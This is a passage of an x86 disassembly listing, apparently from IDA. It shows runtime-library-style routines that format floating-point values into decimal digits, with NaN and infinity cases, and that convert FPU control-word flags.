arg_0 = byte ptr 8
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 74h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
mov ebx, [ebp+arg_14]
push esi
push edi
lea esi, [ebp+arg_0]
lea edi, [ebp+var_10]
movsd
movsd
movsw
mov edx, [ebp+var_8]
mov ecx, edx
mov eax, 8000h
and ecx, eax
and edx, 7FFFh
test cx, cx
mov [ebp+var_60], ebx
mov byte ptr [ebp+var_30], 0CCh
mov byte ptr [ebp+var_30+1], 0CCh
mov byte ptr [ebp+var_30+2], 0CCh
mov byte ptr [ebp+var_30+3], 0CCh
mov byte ptr [ebp+var_2C], 0CCh
mov byte ptr [ebp+var_2C+1], 0CCh
mov byte ptr [ebp+var_2C+2], 0CCh
mov byte ptr [ebp+var_2C+3], 0CCh
mov byte ptr [ebp+var_28], 0CCh
mov byte ptr [ebp+var_28+1], 0CCh
mov byte ptr [ebp+var_28+2], 0FBh
mov byte ptr [ebp+var_28+3], 3Fh
mov [ebp+var_74], 1
mov [ebp+var_6C], ecx
jz short loc_412B2B
mov byte ptr [ebx+2], 2Dh
jmp short loc_412B2F
; ---------------------------------------------------------------------------
loc_412B2B: ; CODE XREF: sub_412AB1+72�j
mov byte ptr [ebx+2], 20h
loc_412B2F: ; CODE XREF: sub_412AB1+78�j
test dx, dx
mov esi, [ebp+var_C]
mov edi, [ebp+var_10]
jnz short loc_412B68
test esi, esi
jnz short loc_412B68
test edi, edi
jnz short loc_412B68
and [ebx], di
cmp cx, ax
setnz al
dec al
and al, 0Dh
add al, 20h
mov [ebx+2], al
mov byte ptr [ebx+3], 1
mov byte ptr [ebx+4], 30h
mov byte ptr [ebx+5], 0
loc_412B60: ; CODE XREF: sub_412AB1+6FB�j
; sub_412AB1+8C3�j
xor eax, eax
inc eax
jmp loc_413331
; ---------------------------------------------------------------------------
loc_412B68: ; CODE XREF: sub_412AB1+87�j
; sub_412AB1+8B�j ...
cmp dx, 7FFFh
jnz loc_412C11
mov eax, 80000000h
cmp esi, eax
mov word ptr [ebx], 1
jnz short loc_412B85
test edi, edi
jz short loc_412B94
loc_412B85: ; CODE XREF: sub_412AB1+CE�j
test esi, 40000000h
jnz short loc_412B94
push offset a1Snan ; "1#SNAN"
jmp short loc_412BE5
; ---------------------------------------------------------------------------
loc_412B94: ; CODE XREF: sub_412AB1+D2�j
; sub_412AB1+DA�j
test cx, cx
jz short loc_412BAC
cmp esi, 0C0000000h
jnz short loc_412BAC
test edi, edi
jnz short loc_412BE0
push offset a1Ind ; "1#IND"
jmp short loc_412BB9
; ---------------------------------------------------------------------------
loc_412BAC: ; CODE XREF: sub_412AB1+E6�j
; sub_412AB1+EE�j
cmp esi, eax
jnz short loc_412BE0
test edi, edi
jnz short loc_412BE0
push offset a1Inf ; "1#INF"
loc_412BB9: ; CODE XREF: sub_412AB1+F9�j
lea eax, [ebx+4]
push 16h
push eax
call sub_4076D5
add esp, 0Ch
xor esi, esi
test eax, eax
jz short loc_412BDA
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_412BDA: ; CODE XREF: sub_412AB1+11A�j
mov byte ptr [ebx+3], 5
jmp short loc_412C0A
; ---------------------------------------------------------------------------
loc_412BE0: ; CODE XREF: sub_412AB1+F2�j
; sub_412AB1+FD�j ...
push offset a1Qnan ; "1#QNAN"
loc_412BE5: ; CODE XREF: sub_412AB1+E1�j
lea eax, [ebx+4]
push 16h
push eax
call sub_4076D5
add esp, 0Ch
xor esi, esi
test eax, eax
jz short loc_412C06
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_412C06: ; CODE XREF: sub_412AB1+146�j
mov byte ptr [ebx+3], 6
loc_412C0A: ; CODE XREF: sub_412AB1+12D�j
xor eax, eax
jmp loc_413331
; ---------------------------------------------------------------------------
loc_412C11: ; CODE XREF: sub_412AB1+BC�j
movzx ecx, dx
mov ebx, ecx
imul ecx, 4D10h
shr ebx, 8
mov eax, esi
shr eax, 18h
lea eax, [ebx+eax*2]
imul eax, 4Dh
lea eax, [eax+ecx-134312F4h]
sar eax, 10h
movzx ecx, ax
movsx ebx, cx
mov [ebp+var_4C], ecx
xor eax, eax
mov ecx, offset dword_424260
neg ebx
sub ecx, 60h
cmp ebx, eax
mov word ptr [ebp+var_16], dx
mov [ebp+var_1A], esi
mov [ebp+var_20+2], edi
mov word ptr [ebp+var_20], ax
mov [ebp+var_68], ecx
jz loc_412F10
jge short loc_412C71
mov ecx, offset dword_4243C0
neg ebx
sub ecx, 60h
mov [ebp+var_68], ecx
loc_412C71: ; CODE XREF: sub_412AB1+1B1�j
cmp ebx, eax
jz loc_412F10
loc_412C79: ; CODE XREF: sub_412AB1+457�j
add [ebp+var_68], 54h
mov ecx, ebx
and ecx, 7
sar ebx, 3
test ecx, ecx
jz loc_412F06
imul ecx, 0Ch
add ecx, [ebp+var_68]
cmp word ptr [ecx], 8000h
mov [ebp+var_64], ecx
jb short loc_412CB0
mov esi, ecx
lea edi, [ebp+var_3C]
movsd
movsd
lea eax, [ebp+var_3C]
movsd
dec [ebp+var_3C+2]
mov [ebp+var_64], eax
mov ecx, eax
loc_412CB0: ; CODE XREF: sub_412AB1+1EA�j
movzx edi, word ptr [ecx+0Ah]
mov edx, [ebp+var_16]
xor eax, eax
mov ecx, edi
mov esi, 7FFFh
xor ecx, edx
and edx, esi
and edi, esi
mov [ebp+var_48], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
and ecx, 8000h
cmp dx, si
lea eax, [edi+edx]
movzx eax, ax
jnb loc_412EEA
cmp di, si
jnb loc_412EEA
cmp ax, 0BFFDh
ja loc_412EEA
cmp ax, 3FBFh
ja short loc_412D10
xor eax, eax
mov [ebp+var_1A+2], eax
mov [ebp-1Ch], eax
mov [ebp+var_20], eax
jmp loc_412F06
; ---------------------------------------------------------------------------
loc_412D10: ; CODE XREF: sub_412AB1+24D�j
xor esi, esi
cmp dx, si
jnz short loc_412D34
inc eax
test [ebp+var_1A+2], 7FFFFFFFh
jnz short loc_412D34
cmp [ebp-1Ch], esi
jnz short loc_412D34
cmp [ebp+var_20], esi
jnz short loc_412D34
mov word ptr [ebp+var_16], si
jmp loc_412F06
; ---------------------------------------------------------------------------
loc_412D34: ; CODE XREF: sub_412AB1+264�j
; sub_412AB1+26E�j ...
cmp di, si
jnz short loc_412D5D
mov edx, [ebp+var_64]
inc eax
test dword ptr [edx+8], 7FFFFFFFh
jnz short loc_412D5D
cmp [edx+4], esi
jnz short loc_412D5D
cmp [edx], esi
jnz short loc_412D5D
mov [ebp+var_1A+2], esi
mov [ebp-1Ch], esi
mov [ebp+var_20], esi
jmp loc_412F06
; ---------------------------------------------------------------------------
loc_412D5D: ; CODE XREF: sub_412AB1+286�j
; sub_412AB1+293�j ...
lea edi, [ebp+var_C]
mov [ebp+var_5C], esi
mov [ebp+var_44], edi
mov [ebp+var_40], 5
loc_412D6D: ; CODE XREF: sub_412AB1+332�j
mov edx, [ebp+var_5C]
mov esi, [ebp+var_40]
add edx, edx
test esi, esi
mov [ebp+var_50], esi
jle short loc_412DD4
lea edx, [ebp+edx+var_20]
mov [ebp+var_58], edx
mov edx, [ebp+var_64]
add edx, 8
mov [ebp+var_54], edx
loc_412D8C: ; CODE XREF: sub_412AB1+321�j
mov edx, [ebp+var_58]
mov esi, [ebp+var_54]
movzx esi, word ptr [esi]
movzx edx, word ptr [edx]
mov edi, [edi-4]
imul edx, esi
and [ebp+var_70], 0
lea esi, [edi+edx]
cmp esi, edi
jb short loc_412DAD
cmp esi, edx
jnb short loc_412DB4
loc_412DAD: ; CODE XREF: sub_412AB1+2F6�j
mov [ebp+var_70], 1
loc_412DB4: ; CODE XREF: sub_412AB1+2FA�j
cmp [ebp+var_70], 0
mov edi, [ebp+var_44]
mov [edi-4], esi
jz short loc_412DC3
inc word ptr [edi]
loc_412DC3: ; CODE XREF: sub_412AB1+30D�j
add [ebp+var_58], 2
sub [ebp+var_54], 2
dec [ebp+var_50]
cmp [ebp+var_50], 0
jg short loc_412D8C
loc_412DD4: ; CODE XREF: sub_412AB1+2C9�j
inc edi
inc edi
inc [ebp+var_5C]
dec [ebp+var_40]
cmp [ebp+var_40], 0
mov [ebp+var_44], edi
jg short loc_412D6D
add eax, 0C002h
test ax, ax
jle short loc_412E2A
loc_412DEF: ; CODE XREF: sub_412AB1+372�j
test [ebp+var_8], 80000000h
jnz short loc_412E25
mov edx, [ebp+var_10]
mov edi, [ebp+var_C]
mov esi, [ebp+var_C]
shl [ebp+var_10], 1
shr edx, 1Fh
add edi, edi
or edi, edx
mov edx, [ebp+var_8]
shr esi, 1Fh
add edx, edx
or edx, esi
add eax, 0FFFFh
test ax, ax
mov [ebp+var_C], edi
mov [ebp+var_8], edx
jg short loc_412DEF
loc_412E25: ; CODE XREF: sub_412AB1+345�j
test ax, ax
jg short loc_412E7C
loc_412E2A: ; CODE XREF: sub_412AB1+33C�j
add eax, 0FFFFh
test ax, ax
jge short loc_412E7C
mov edx, eax
neg edx
movzx edx, dx
mov [ebp+var_44], edx
add eax, edx
loc_412E40: ; CODE XREF: sub_412AB1+3BE�j
test byte ptr [ebp+var_10], 1
jz short loc_412E49
inc [ebp+var_48]
loc_412E49: ; CODE XREF: sub_412AB1+393�j
mov edx, [ebp+var_8]
mov edi, [ebp+var_C]
mov esi, [ebp+var_C]
shr [ebp+var_8], 1
shl edx, 1Fh
shr edi, 1
or edi, edx
mov edx, [ebp+var_10]
shl esi, 1Fh
shr edx, 1
or edx, esi
dec [ebp+var_44]
mov [ebp+var_C], edi
mov [ebp+var_10], edx
jnz short loc_412E40
cmp [ebp+var_48], 0
jz short loc_412E7C
or word ptr [ebp+var_10], 1
loc_412E7C: ; CODE XREF: sub_412AB1+377�j
; sub_412AB1+381�j ...
cmp word ptr [ebp+var_10], 8000h
ja short loc_412E95
mov edx, [ebp+var_10]
and edx, 1FFFFh
cmp edx, 18000h
jnz short loc_412EC8
loc_412E95: ; CODE XREF: sub_412AB1+3D1�j
cmp [ebp+var_10+2], 0FFFFFFFFh
jnz short loc_412EC5
and [ebp+var_10+2], 0
cmp [ebp+var_C+2], 0FFFFFFFFh
jnz short loc_412EC0
and [ebp+var_C+2], 0
cmp word ptr [ebp+var_8+2], 0FFFFh
jnz short loc_412EBA
mov word ptr [ebp+var_8+2], 8000h
inc eax
jmp short loc_412EC8
; ---------------------------------------------------------------------------
loc_412EBA: ; CODE XREF: sub_412AB1+3FE�j
inc word ptr [ebp+var_8+2]
jmp short loc_412EC8
; ---------------------------------------------------------------------------
loc_412EC0: ; CODE XREF: sub_412AB1+3F2�j
inc [ebp+var_C+2]
jmp short loc_412EC8
; ---------------------------------------------------------------------------
loc_412EC5: ; CODE XREF: sub_412AB1+3E8�j
inc [ebp+var_10+2]
loc_412EC8: ; CODE XREF: sub_412AB1+3E2�j
; sub_412AB1+407�j ...
cmp ax, 7FFFh
jnb short loc_412EEA
mov dx, word ptr [ebp+var_10+2]
mov word ptr [ebp+var_20], dx
mov edx, [ebp+var_C]
mov [ebp+var_20+2], edx
mov edx, [ebp+var_8]
or eax, ecx
mov [ebp+var_1A], edx
mov word ptr [ebp+var_16], ax
jmp short loc_412F06
; ---------------------------------------------------------------------------
loc_412EEA: ; CODE XREF: sub_412AB1+230�j
; sub_412AB1+239�j ...
neg cx
sbb ecx, ecx
and dword ptr [ebp-1Ch], 0
and ecx, 80000000h
add ecx, 7FFF8000h
and [ebp+var_20], 0
mov [ebp+var_1A+2], ecx
loc_412F06: ; CODE XREF: sub_412AB1+1D6�j
; sub_412AB1+25A�j ...
test ebx, ebx
jnz loc_412C79
xor eax, eax
loc_412F10: ; CODE XREF: sub_412AB1+1AB�j
; sub_412AB1+1C2�j
mov ecx, [ebp+var_1A+2]
shr ecx, 10h
cmp cx, 3FFFh
mov ebx, 7FFFh
jb loc_413170
mov esi, [ebp+var_28+2]
inc [ebp+var_4C]
movzx edx, cx
mov ecx, esi
xor ecx, edx
and edx, ebx
and esi, ebx
and ecx, 8000h
cmp dx, bx
lea edi, [esi+edx]
mov [ebp+var_58], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
movzx edi, di
jnb loc_413156
cmp si, bx
jnb loc_413156
cmp di, 0BFFDh
ja loc_413156
cmp di, 3FBFh
ja short loc_412F7B
loc_412F73: ; CODE XREF: sub_412AB1+503�j
mov [ebp+var_1A+2], eax
jmp loc_41316A
; ---------------------------------------------------------------------------
loc_412F7B: ; CODE XREF: sub_412AB1+4C0�j
cmp dx, ax
jnz short loc_412F9D
inc edi
test [ebp+var_1A+2], 7FFFFFFFh
jnz short loc_412F9D
cmp [ebp-1Ch], eax
jnz short loc_412F9D
cmp [ebp+var_20], eax
jnz short loc_412F9D
mov word ptr [ebp+var_16], ax
jmp loc_413170
; ---------------------------------------------------------------------------
loc_412F9D: ; CODE XREF: sub_412AB1+4CD�j
; sub_412AB1+4D7�j ...
cmp si, ax
jnz short loc_412FB6
inc edi
test [ebp+var_28], 7FFFFFFFh
jnz short loc_412FB6
cmp [ebp+var_2C], eax
jnz short loc_412FB6
cmp [ebp+var_30], eax
jz short loc_412F73
loc_412FB6: ; CODE XREF: sub_412AB1+4EF�j
; sub_412AB1+4F9�j ...
and [ebp+var_54], 0
lea eax, [ebp+var_C]
mov [ebp+var_40], 5
loc_412FC4: ; CODE XREF: sub_412AB1+580�j
mov edx, [ebp+var_54]
mov esi, [ebp+var_40]
add edx, edx
test esi, esi
mov [ebp+var_50], esi
jle short loc_413025
lea esi, [ebp+var_28]
lea edx, [ebp+edx+var_20]
mov [ebp+var_5C], esi
mov [ebp+var_48], edx
loc_412FE0: ; CODE XREF: sub_412AB1+572�j
mov edx, [ebp+var_5C]
mov esi, [ebp+var_48]
movzx esi, word ptr [esi]
movzx edx, word ptr [edx]
and [ebp+var_44], 0
imul edx, esi
mov esi, [eax-4]
lea ebx, [esi+edx]
cmp ebx, esi
jb short loc_413001
cmp ebx, edx
jnb short loc_413008
loc_413001: ; CODE XREF: sub_412AB1+54A�j
mov [ebp+var_44], 1
loc_413008: ; CODE XREF: sub_412AB1+54E�j
cmp [ebp+var_44], 0
mov [eax-4], ebx
jz short loc_413014
inc word ptr [eax]
loc_413014: ; CODE XREF: sub_412AB1+55E�j
add [ebp+var_48], 2
sub [ebp+var_5C], 2
dec [ebp+var_50]
cmp [ebp+var_50], 0
jg short loc_412FE0
loc_413025: ; CODE XREF: sub_412AB1+520�j
inc eax
inc eax
inc [ebp+var_54]
dec [ebp+var_40]
cmp [ebp+var_40], 0
jg short loc_412FC4
add edi, 0C002h
xor eax, eax
cmp di, ax
jle short loc_41307C
loc_413040: ; CODE XREF: sub_412AB1+5C4�j
test [ebp+var_8], 80000000h
jnz short loc_413077
mov edx, [ebp+var_10]
mov ebx, [ebp+var_C]
mov esi, [ebp+var_C]
shl [ebp+var_10], 1
shr edx, 1Fh
add ebx, ebx
or ebx, edx
mov edx, [ebp+var_8]
shr esi, 1Fh
add edx, edx
or edx, esi
add edi, 0FFFFh
cmp di, ax
mov [ebp+var_C], ebx
mov [ebp+var_8], edx
jg short loc_413040
loc_413077: ; CODE XREF: sub_412AB1+596�j
cmp di, ax
jg short loc_4130CB
loc_41307C: ; CODE XREF: sub_412AB1+58D�j
add edi, 0FFFFh
cmp di, ax
jge short loc_4130CB
mov eax, edi
neg eax
movzx eax, ax
add edi, eax
loc_413090: ; CODE XREF: sub_412AB1+60C�j
test byte ptr [ebp+var_10], 1
jz short loc_413099
inc [ebp+var_58]
loc_413099: ; CODE XREF: sub_412AB1+5E3�j
mov edx, [ebp+var_8]
mov ebx, [ebp+var_C]
mov esi, [ebp+var_C]
shr [ebp+var_8], 1
shl edx, 1Fh
shr ebx, 1
or ebx, edx
mov edx, [ebp+var_10]
shl esi, 1Fh
shr edx, 1
or edx, esi
dec eax
mov [ebp+var_C], ebx
mov [ebp+var_10], edx
jnz short loc_413090
xor eax, eax
cmp [ebp+var_58], eax
jz short loc_4130CB
or word ptr [ebp+var_10], 1
loc_4130CB: ; CODE XREF: sub_412AB1+5C9�j
; sub_412AB1+5D4�j ...
cmp word ptr [ebp+var_10], 8000h
ja short loc_4130E4
mov edx, [ebp+var_10]
and edx, 1FFFFh
cmp edx, 18000h
jnz short loc_413115
loc_4130E4: ; CODE XREF: sub_412AB1+620�j
cmp [ebp+var_10+2], 0FFFFFFFFh
jnz short loc_413112
cmp [ebp+var_C+2], 0FFFFFFFFh
mov [ebp+var_10+2], eax
jnz short loc_41310D
cmp word ptr [ebp+var_8+2], 0FFFFh
mov [ebp+var_C+2], eax
jnz short loc_413107
mov word ptr [ebp+var_8+2], 8000h
inc edi
jmp short loc_413115
; ---------------------------------------------------------------------------
loc_413107: ; CODE XREF: sub_412AB1+64B�j
inc word ptr [ebp+var_8+2]
jmp short loc_413115
; ---------------------------------------------------------------------------
loc_41310D: ; CODE XREF: sub_412AB1+640�j
inc [ebp+var_C+2]
jmp short loc_413115
; ---------------------------------------------------------------------------
loc_413112: ; CODE XREF: sub_412AB1+637�j
inc [ebp+var_10+2]
loc_413115: ; CODE XREF: sub_412AB1+631�j
; sub_412AB1+654�j ...
cmp di, 7FFFh
jb short loc_41313A
neg cx
mov [ebp-1Ch], eax
mov [ebp+var_20], eax
sbb ecx, ecx
and ecx, 80000000h
add ecx, 7FFF8000h
mov [ebp+var_1A+2], ecx
loc_413136: ; CODE XREF: sub_412AB1+6A3�j
xor eax, eax
jmp short loc_413170
; ---------------------------------------------------------------------------
loc_41313A: ; CODE XREF: sub_412AB1+669�j
mov ax, word ptr [ebp+var_10+2]
mov word ptr [ebp+var_20], ax
mov eax, [ebp+var_C]
mov [ebp+var_20+2], eax
mov eax, [ebp+var_8]
or edi, ecx
mov [ebp+var_1A], eax
mov word ptr [ebp+var_16], di
jmp short loc_413136
; ---------------------------------------------------------------------------
loc_413156: ; CODE XREF: sub_412AB1+4A1�j
; sub_412AB1+4AA�j ...
neg cx
sbb ecx, ecx
and ecx, 80000000h
add ecx, 7FFF8000h
mov [ebp+var_1A+2], ecx
loc_41316A: ; CODE XREF: sub_412AB1+4C5�j
mov [ebp-1Ch], eax
mov [ebp+var_20], eax
loc_413170: ; CODE XREF: sub_412AB1+46F�j
; sub_412AB1+4E7�j ...
test [ebp+arg_10], 1
mov edx, [ebp+var_60]
mov ecx, [ebp+var_4C]
mov [edx], cx
jz short loc_4131B1
movsx ecx, cx
add [ebp+arg_C], ecx
cmp [ebp+arg_C], eax
jg short loc_4131B1
and word ptr [edx], 0
cmp word ptr [ebp+var_6C], 8000h
mov byte ptr [edx+3], 1
setnz al
dec al
and al, 0Dh
add al, 20h
mov [edx+2], al
mov byte ptr [edx+4], 30h
mov byte ptr [edx+5], 0
jmp loc_412B60
; ---------------------------------------------------------------------------
loc_4131B1: ; CODE XREF: sub_412AB1+6CC�j
; sub_412AB1+6D7�j
push 15h
pop ecx
cmp [ebp+arg_C], ecx
jle short loc_4131BC
mov [ebp+arg_C], ecx
loc_4131BC: ; CODE XREF: sub_412AB1+706�j
mov esi, [ebp+var_1A+2]
shr esi, 10h
push 8
sub esi, 3FFEh
mov word ptr [ebp+var_16], ax
pop ebx
loc_4131CF: ; CODE XREF: sub_412AB1+742�j
mov eax, [ebp+var_20]
mov edi, [ebp-1Ch]
mov ecx, [ebp-1Ch]
shl [ebp+var_20], 1
shr eax, 1Fh
add edi, edi
or edi, eax
mov eax, [ebp+var_1A+2]
shr ecx, 1Fh
add eax, eax
or eax, ecx
dec ebx
mov [ebp-1Ch], edi
mov [ebp+var_1A+2], eax
jnz short loc_4131CF
test esi, esi
jge short loc_41322B
neg esi
and esi, 0FFh
jle short loc_41322B
loc_413203: ; CODE XREF: sub_412AB1+778�j
mov eax, [ebp+var_1A+2]
mov edi, [ebp-1Ch]
mov ecx, [ebp-1Ch]
shr [ebp+var_1A+2], 1
shl eax, 1Fh
shr edi, 1
or edi, eax
mov eax, [ebp+var_20]
shl ecx, 1Fh
shr eax, 1
or eax, ecx
dec esi
test esi, esi
mov [ebp-1Ch], edi
mov [ebp+var_20], eax
jg short loc_413203
loc_41322B: ; CODE XREF: sub_412AB1+746�j
; sub_412AB1+750�j
mov eax, [ebp+arg_C]
inc eax
test eax, eax
lea ebx, [edx+4]
mov [ebp+var_40], ebx
mov [ebp+var_4C], eax
jle loc_4132F5
loc_413240: ; CODE XREF: sub_412AB1+83E�j
mov edx, [ebp+var_20]
mov eax, [ebp-1Ch]
lea esi, [ebp+var_20]
lea edi, [ebp+var_3C]
movsd
movsd
movsd
shl [ebp+var_20], 1
mov edi, [ebp+var_20]
shl [ebp+var_20], 1
shr edx, 1Fh
lea ecx, [eax+eax]
or ecx, edx
mov edx, [ebp+var_1A+2]
mov esi, eax
shr esi, 1Fh
add edx, edx
or edx, esi
mov eax, ecx
lea esi, [ecx+ecx]
shr eax, 1Fh
lea ecx, [edx+edx]
mov edx, [ebp+var_3C]
shr edi, 1Fh
or ecx, eax
mov eax, [ebp+var_20]
or esi, edi
lea edi, [edx+eax]
cmp edi, eax
jb short loc_41328F
cmp edi, edx
jnb short loc_4132A7
loc_41328F: ; CODE XREF: sub_412AB1+7D8�j
lea eax, [esi+1]
xor edx, edx
cmp eax, esi
jb short loc_41329D
cmp eax, 1
jnb short loc_4132A0
loc_41329D: ; CODE XREF: sub_412AB1+7E5�j
xor edx, edx
inc edx
loc_4132A0: ; CODE XREF: sub_412AB1+7EA�j
test edx, edx
mov esi, eax
jz short loc_4132A7
inc ecx
loc_4132A7: ; CODE XREF: sub_412AB1+7DC�j
; sub_412AB1+7F3�j
mov eax, [ebp+var_38]
lea edx, [eax+esi]
cmp edx, esi
mov [ebp+var_44], edx
jb short loc_4132B8
cmp edx, eax
jnb short loc_4132B9
loc_4132B8: ; CODE XREF: sub_412AB1+801�j
inc ecx
loc_4132B9: ; CODE XREF: sub_412AB1+805�j
add ecx, [ebp+var_34]
shr edx, 1Fh
add ecx, ecx
or ecx, edx
lea esi, [edi+edi]
mov [ebp+var_20], esi
mov esi, [ebp+var_44]
mov [ebp+var_1A+2], ecx
shr ecx, 18h
add esi, esi
add cl, 30h
mov eax, edi
shr eax, 1Fh
or esi, eax
mov [ebx], cl
inc ebx
dec [ebp+var_4C]
cmp [ebp+var_4C], 0
mov [ebp-1Ch], esi
mov byte ptr [ebp+var_16+1], 0
jg loc_413240
loc_4132F5: ; CODE XREF: sub_412AB1+789�j
dec ebx
mov al, [ebx]
dec ebx
cmp al, 35h
jge short loc_41330B
mov ecx, [ebp+var_40]
jmp short loc_413346
; ---------------------------------------------------------------------------
loc_413302: ; CODE XREF: sub_412AB1+85D�j
cmp byte ptr [ebx], 39h
jnz short loc_413310
mov byte ptr [ebx], 30h
dec ebx
loc_41330B: ; CODE XREF: sub_412AB1+84A�j
cmp ebx, [ebp+var_40]
jnb short loc_413302
loc_413310: ; CODE XREF: sub_412AB1+854�j
cmp ebx, [ebp+var_40]
mov eax, [ebp+var_60]
jnb short loc_41331C
inc ebx
inc word ptr [eax]
loc_41331C: ; CODE XREF: sub_412AB1+865�j
inc byte ptr [ebx]
loc_41331E: ; CODE XREF: sub_412AB1+89E�j
sub bl, al
sub bl, 3
movsx ecx, bl
mov [eax+3], bl
mov byte ptr [ecx+eax+4], 0
mov eax, [ebp+var_74]
loc_413331: ; CODE XREF: sub_412AB1+B2�j
; sub_412AB1+15B�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
; ---------------------------------------------------------------------------
loc_413340: ; CODE XREF: sub_412AB1+897�j
cmp byte ptr [ebx], 30h
jnz short loc_41334A
dec ebx
loc_413346: ; CODE XREF: sub_412AB1+84F�j
cmp ebx, ecx
jnb short loc_413340
loc_41334A: ; CODE XREF: sub_412AB1+892�j
cmp ebx, ecx
mov eax, [ebp+var_60]
jnb short loc_41331E
and word ptr [eax], 0
cmp word ptr [ebp+var_6C], 8000h
mov byte ptr [eax+3], 1
setnz dl
dec dl
and dl, 0Dh
add dl, 20h
mov [eax+2], dl
mov byte ptr [ecx], 30h
mov byte ptr [eax+5], 0
jmp loc_412B60
sub_412AB1 endp
; =============== S U B R O U T I N E =======================================
sub_413379 proc near ; CODE XREF: sub_4134A7+C0�p
xor eax, eax
test bl, 10h
jz short loc_413381
inc eax
loc_413381: ; CODE XREF: sub_413379+5�j
test bl, 8
jz short loc_413389
or eax, 4
loc_413389: ; CODE XREF: sub_413379+B�j
test bl, 4
jz short loc_413391
or eax, 8
loc_413391: ; CODE XREF: sub_413379+13�j
test bl, 2
jz short loc_413399
or eax, 10h
loc_413399: ; CODE XREF: sub_413379+1B�j
test bl, 1
jz short loc_4133A1
or eax, 20h
loc_4133A1: ; CODE XREF: sub_413379+23�j
test ebx, 80000h
jz short loc_4133AC
or eax, 2
loc_4133AC: ; CODE XREF: sub_413379+2E�j
mov ecx, ebx
mov edx, 300h
and ecx, edx
push esi
mov esi, 200h
jz short loc_4133E0
cmp ecx, 100h
jz short loc_4133DB
cmp ecx, esi
jz short loc_4133D4
cmp ecx, edx
jnz short loc_4133E0
or eax, 0C00h
jmp short loc_4133E0
; ---------------------------------------------------------------------------
loc_4133D4: ; CODE XREF: sub_413379+4E�j
or eax, 800h
jmp short loc_4133E0
; ---------------------------------------------------------------------------
loc_4133DB: ; CODE XREF: sub_413379+4A�j
or eax, 400h
loc_4133E0: ; CODE XREF: sub_413379+42�j
; sub_413379+52�j ...
mov ecx, ebx
and ecx, 30000h
jz short loc_4133F6
cmp ecx, 10000h
jnz short loc_4133F8
or eax, esi
jmp short loc_4133F8
; ---------------------------------------------------------------------------
loc_4133F6: ; CODE XREF: sub_413379+6F�j
or eax, edx
loc_4133F8: ; CODE XREF: sub_413379+77�j
; sub_413379+7B�j
test ebx, 40000h
pop esi
jz short locret_413406
or eax, 1000h
locret_413406: ; CODE XREF: sub_413379+86�j
retn
sub_413379 endp
; =============== S U B R O U T I N E =======================================
sub_413407 proc near ; CODE XREF: sub_4134A7:loc_4136E0�p
xor eax, eax
test dl, 10h
jz short loc_413413
mov eax, 80h
loc_413413: ; CODE XREF: sub_413407+5�j
test dl, 8
push ebx
push esi
push edi
mov ebx, 200h
jz short loc_413422
or eax, ebx
loc_413422: ; CODE XREF: sub_413407+17�j
test dl, 4
jz short loc_41342C
or eax, 400h
loc_41342C: ; CODE XREF: sub_413407+1E�j
test dl, 2
jz short loc_413436
or eax, 800h
loc_413436: ; CODE XREF: sub_413407+28�j
test dl, 1
jz short loc_413440
or eax, 1000h
loc_413440: ; CODE XREF: sub_413407+32�j
test edx, 80000h
mov edi, 100h
jz short loc_41344F
or eax, edi
loc_41344F: ; CODE XREF: sub_413407+44�j
mov ecx, edx
mov esi, 300h
and ecx, esi
jz short loc_413479
cmp ecx, edi
jz short loc_413474
cmp ecx, ebx
jz short loc_41346D
cmp ecx, esi
jnz short loc_413479
or eax, 6000h
jmp short loc_413479
; ---------------------------------------------------------------------------
loc_41346D: ; CODE XREF: sub_413407+59�j
or eax, 4000h
jmp short loc_413479
; ---------------------------------------------------------------------------
loc_413474: ; CODE XREF: sub_413407+55�j
or eax, 2000h
loc_413479: ; CODE XREF: sub_413407+51�j
; sub_413407+5D�j ...
mov ecx, 3000000h
pop edi
and edx, ecx
cmp edx, 1000000h
pop esi
pop ebx
jz short loc_4134A1
cmp edx, 2000000h
jz short loc_41349D
cmp edx, ecx
jnz short locret_4134A6
or eax, 8000h
retn
; ---------------------------------------------------------------------------
loc_41349D: ; CODE XREF: sub_413407+8A�j
or eax, 40h
retn
; ---------------------------------------------------------------------------
loc_4134A1: ; CODE XREF: sub_413407+82�j
or eax, 8040h
locret_4134A6: ; CODE XREF: sub_413407+8E�j
retn
sub_413407 endp
; =============== S U B R O U T I N E =======================================
sub_4134A7 proc near ; CODE XREF: sub_4118FF+25�p
; sub_4118FF+55�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 10h
push ebx
push ebp
push esi
push edi
fstcw word ptr [esp+20h+var_C]
mov ebx, [esp+20h+var_C]
xor edx, edx
test bl, 1
jz short loc_4134C1
push 10h
pop edx
loc_4134C1: ; CODE XREF: sub_4134A7+15�j
test bl, 4
jz short loc_4134C9
or edx, 8
loc_4134C9: ; CODE XREF: sub_4134A7+1D�j
test bl, 8
jz short loc_4134D1
or edx, 4
loc_4134D1: ; CODE XREF: sub_4134A7+25�j
test bl, 10h
jz short loc_4134D9
or edx, 2
loc_4134D9: ; CODE XREF: sub_4134A7+2D�j
test bl, 20h
jz short loc_4134E1
or edx, 1
loc_4134E1: ; CODE XREF: sub_4134A7+35�j
test bl, 2
jz short loc_4134EC
or edx, 80000h
loc_4134EC: ; CODE XREF: sub_4134A7+3D�j
movzx ecx, bx
mov eax, ecx
mov edi, 0C00h
and eax, edi
mov ebp, 300h
mov esi, 200h
jz short loc_413524
cmp eax, 400h
jz short loc_41351E
cmp eax, 800h
jz short loc_41351A
cmp eax, edi
jnz short loc_413524
or edx, ebp
jmp short loc_413524
; ---------------------------------------------------------------------------
loc_41351A: ; CODE XREF: sub_4134A7+69�j
or edx, esi
jmp short loc_413524
; ---------------------------------------------------------------------------
loc_41351E: ; CODE XREF: sub_4134A7+62�j
or edx, 100h
loc_413524: ; CODE XREF: sub_4134A7+5B�j
; sub_4134A7+6D�j ...
and ecx, ebp
jz short loc_413534
cmp ecx, esi
jnz short loc_41353A
or edx, 10000h
